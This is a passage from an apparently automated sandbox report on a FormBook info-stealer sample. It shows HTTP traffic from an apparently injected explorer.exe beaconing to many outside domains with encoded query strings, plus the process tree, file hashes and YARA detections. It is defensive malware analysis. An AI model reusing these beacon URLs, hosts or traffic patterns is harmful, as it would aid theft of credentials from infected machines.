                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Jun 22, 2021 18:25:23.498655081 CEST9034INHTTP/1.1 301 Moved Permanently
                                                                                                                  Server: openresty
                                                                                                                  Date: Tue, 22 Jun 2021 16:25:23 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 166
                                                                                                                  Connection: close
                                                                                                                  Location: https://www.underce.com/bp3i/?2db=80R/aSnQ9cMncl3xr61KDuAjYp2ZOr6pxPcjEdydNICfLnQ2vp9ekDHPlA0NjzWfFYRL&ApZx=O2MHiVr0W
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  3192.168.2.549743185.53.177.1280C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Jun 22, 2021 18:25:28.670067072 CEST9623OUTGET /bp3i/?2db=cas+hsZJvZFo3GF+EdMNCMOiV1dGjFKaknimsFdRmzAJWDDXgl+w3pBTGW4WB38KsB49&ApZx=O2MHiVr0W HTTP/1.1
                                                                                                                  Host: www.fredrika-stahl.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Jun 22, 2021 18:25:28.712451935 CEST9624INHTTP/1.1 403 Forbidden
                                                                                                                  Server: nginx
                                                                                                                  Date: Tue, 22 Jun 2021 16:25:28 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 146
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  4192.168.2.54974667.199.248.1280C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Jun 22, 2021 18:25:33.868663073 CEST9713OUTGET /bp3i/?2db=/O9fLU9fKPl9hp8FjcQBjfSEDJBN8B2QQZ2zni9zphKaS5k3K3CvlS+mwENkfwkv1cT8&ApZx=O2MHiVr0W HTTP/1.1
                                                                                                                  Host: www.doodstore.net
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Jun 22, 2021 18:25:34.017278910 CEST9714INHTTP/1.1 302 Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Tue, 22 Jun 2021 16:25:33 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 0
                                                                                                                  Set-Cookie: anon_u=cHN1X18wN2Y4NzA5Yi1jODFjLTRiMmMtYmZkNC05NTUzOGIxZWNiZTI=|1624379133|145dbdce4dcc0b7ea9e772ebe809527624e89d4e; Domain=bitly.com; expires=Sun, 19 Dec 2021 16:25:33 GMT; httponly; Path=/; secure
                                                                                                                  Strict-Transport-Security: max-age=1209600
                                                                                                                  Location: https://bitly.com/pages/landing/branded-short-domains-powered-by-bitly?bsd=doodstore.net
                                                                                                                  Pragma: no-cache
                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                  X-Frame-Options: DENY
                                                                                                                  P3p: CP="CAO PSA OUR"
                                                                                                                  Via: 1.1 google
                                                                                                                  Connection: close


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  5192.168.2.54974950.87.146.9980C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Jun 22, 2021 18:25:44.760615110 CEST9748OUTGET /bp3i/?2db=E7M2l69Gv0yeE4KBOXHGh6mx//FtP199Dh6qlRwE96ss/V1ksNZ+8ksSpGi6EwZCpyax&ApZx=O2MHiVr0W HTTP/1.1
                                                                                                                  Host: www.mutanterestaurante.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Jun 22, 2021 18:25:44.979393005 CEST9749INHTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 22 Jun 2021 16:25:44 GMT
                                                                                                                  Server: Apache
                                                                                                                  Upgrade: h2,h2c
                                                                                                                  Connection: Upgrade, close
                                                                                                                  Last-Modified: Sat, 30 Nov 2019 02:37:20 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Content-Length: 746
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Content-Type: text/html
                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 36 65 6d 3b 20 7d 20 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 47 65 6f 72 67 69 61 2c 20 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 34 61 34 61 34 61 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 65 6d 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 22 3e 0a 20 20 20 20 53 6f 72 72 79 2c 20 74 68 69 73 20 70 61 67 65 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 65 20 55 52 4c 20 6f 72 20 67 6f 20 62 61 63 6b 20 61 20 70 61 67 65 2e 0a 20 20 3c 2f 68 31 3e 0a 20 20 0a 20 20 3c 68 32 20 73 74 79 6c 65 3d 22 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 37 64 37 64 37 64 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 22 3e 0a 20 20 20 20 34 30 34 20 45 72 72 6f 72 2e 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 0a 20 20 3c 2f 68 32 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <style> @media screen and (max-width:500px) { body { font-size: .6em; } } </style></head><body style="text-align: center;"> <h1 style="font-family: Georgia, serif; color: #4a4a4a; margin-top: 4em; line-height: 1.5;"> Sorry, this page doesn't exist.<br>Please check the URL or go back a page. </h1> <h2 style=" font-family: Verdana, sans-serif; color: #7d7d7d; font-weight: 300;"> 404 Error. Page Not Found. </h2> </body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  6192.168.2.54975023.225.101.3280C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Jun 22, 2021 18:25:50.296525002 CEST9749OUTGET /bp3i/?2db=zwAt45JEztQSRxPdch59MI6sbMm9ozxv/QrdgZuHtz8DMTYJ2HUJlOY3K2JoQYzD174Y&ApZx=O2MHiVr0W HTTP/1.1
                                                                                                                  Host: www.9wsc.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Jun 22, 2021 18:25:50.530720949 CEST9750INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Jun 2021 16:25:43 GMT
                                                                                                                  Content-Length: 788
                                                                                                                  Content-Type: text/html
                                                                                                                  Server: nginx
                                                                                                                  Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e cf c3 c3 c5 c3 bf d0 d0 bf c6 bc bc b9 c9 b7 dd d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="text/javascript" src="/tj.js"></script></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  7192.168.2.54975194.136.40.5180C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Jun 22, 2021 18:25:55.696207047 CEST9752OUTGET /bp3i/?2db=zbNXh78uhP7VzN8kPHFueaY47g6J6psPJhyFJvfKuCHih9LJaB8PnmAAQmuNnVgiv7yX&ApZx=O2MHiVr0W HTTP/1.1
                                                                                                                  Host: www.5xlsteve.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Jun 22, 2021 18:25:55.754239082 CEST9752INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Tue, 22 Jun 2021 16:25:55 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 793
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 61 6e 74 20 79 6f 75 72 20 6f 77 6e 20 77 65 62 73 69 74 65 3f 20 7c 20 31 32 33 20 52 65 67 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 2d 75 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 4f 42 4f 54 53 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 65 74 20 6f 6e 6c 69 6e 65 20 77 69 74 68 20 57 65 62 73 69 74 65 20 42 75 69 6c 64 65 72 21 20 43 72 65 61 74 65 20 61 20 66 72 65 65 20 32 2d 70 61 67 65 20 77 65 62 73 69 74 65 20 74 6f 20 67 6f 20 77 69 74 68 20 79 6f 75 72 20 6e 65 77 20 64 6f 6d 61 69 6e 2e 20 53 74 61 72 74 20 6e 6f 77 20 66 6f 72 20 66 72 65 65 2c 20 6e 6f 20 63 72 65 64 69 74 20 63 61 72 64 20 72 65 71 75 69 72 65 64 21 22 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2f 73 74 79 6c 65 73 68 65 65 74 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 31 32 33 2d 72 65 67 2d 6e 65 77 2d 64 6f 6d 61 69 6e 2e 63 6f 2e 75 6b 2f 69 66 72 61 6d 65 2e 68 74 6d 6c 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en-GB"><head><title>Want your own website? | 123 Reg</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-equiv="Content-Language" content="en-us" /><meta name="ROBOTS" content="NOINDEX, NOFOLLOW"><meta name="description" content="Get online with Website Builder! Create a free 2-page website to go with your new domain. Start now for free, no credit card required!"/> <meta name="viewport" content="width=device-width"><link rel="stylesheet" href="/style/stylesheet.css" type="text/css" media="all"> <link rel="icon" type="image/png" href="favicon-32x32.png" sizes="32x32"></head><body> <iframe src="https://www.123-reg-new-domain.co.uk/iframe.html" width="100%" scrolling="no"></iframe></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  8192.168.2.549752184.168.131.24180C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Jun 22, 2021 18:26:01.057169914 CEST9753OUTGET /bp3i/?2db=+tA82deiMnBv5x6tQvXabF4qHjy6FJLdLGXe/FevxPH8etKnEP6uMBOxOd38qIM/2l+B&ApZx=O2MHiVr0W HTTP/1.1
                                                                                                                  Host: www.oceancollaborative.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Jun 22, 2021 18:26:01.285360098 CEST9754INHTTP/1.1 302 Found
                                                                                                                  Server: nginx/1.16.1
                                                                                                                  Date: Tue, 22 Jun 2021 16:26:01 GMT
                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Location: https://afternic.com/forsale/oceancollaborative.com?utm_source=TDFS&utm_medium=sn_affiliate_click&utm_campaign=TDFS_GoDaddy_DLS&traffic_type=TDFS&traffic_id=GoDaddy_DLS
                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  9192.168.2.54975334.102.136.18080C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Jun 22, 2021 18:26:06.429832935 CEST9755OUTGET /bp3i/?2db=zzYPr0OAQH7TXWaM6HNOV25V/HRJbXLG3d0AEq0Xu0niOsubCwaCiuhJfb7NIA/TR+lf&ApZx=O2MHiVr0W HTTP/1.1
                                                                                                                  Host: www.motivactivewear.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Jun 22, 2021 18:26:06.571907043 CEST9755INHTTP/1.1 403 Forbidden
                                                                                                                  Server: openresty
                                                                                                                  Date: Tue, 22 Jun 2021 16:26:06 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 275
                                                                                                                  ETag: "60cf306c-113"
                                                                                                                  Via: 1.1 google
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                  Code Manipulations

                                                                                                                  Statistics

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  Analysis Process: WXs8v9QuE7.exe PID: 5432 Parent PID: 5752

                                                                                                                  General

                                                                                                                  Start time:18:24:02
                                                                                                                  Start date:22/06/2021
                                                                                                                  Path:C:\Users\user\Desktop\WXs8v9QuE7.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\Desktop\WXs8v9QuE7.exe'
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:205564 bytes
                                                                                                                  MD5 hash:1F45B0E2BD669BCE49B2140373243A91
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  Reputation:low

                                                                                                                  Analysis Process: WXs8v9QuE7.exe PID: 5880 Parent PID: 5432

                                                                                                                  General

                                                                                                                  Start time:18:24:03
                                                                                                                  Start date:22/06/2021
                                                                                                                  Path:C:\Users\user\Desktop\WXs8v9QuE7.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\Desktop\WXs8v9QuE7.exe'
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:205564 bytes
                                                                                                                  MD5 hash:1F45B0E2BD669BCE49B2140373243A91
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  Reputation:low

                                                                                                                  Analysis Process: explorer.exe PID: 3472 Parent PID: 5880

                                                                                                                  General

                                                                                                                  Start time:18:24:07
                                                                                                                  Start date:22/06/2021
                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                  Imagebase:0x7ff693d90000
                                                                                                                  File size:3933184 bytes
                                                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Analysis Process: autoconv.exe PID: 5428 Parent PID: 3472

                                                                                                                  General

                                                                                                                  Start time:18:24:31
                                                                                                                  Start date:22/06/2021
                                                                                                                  Path:C:\Windows\SysWOW64\autoconv.exe
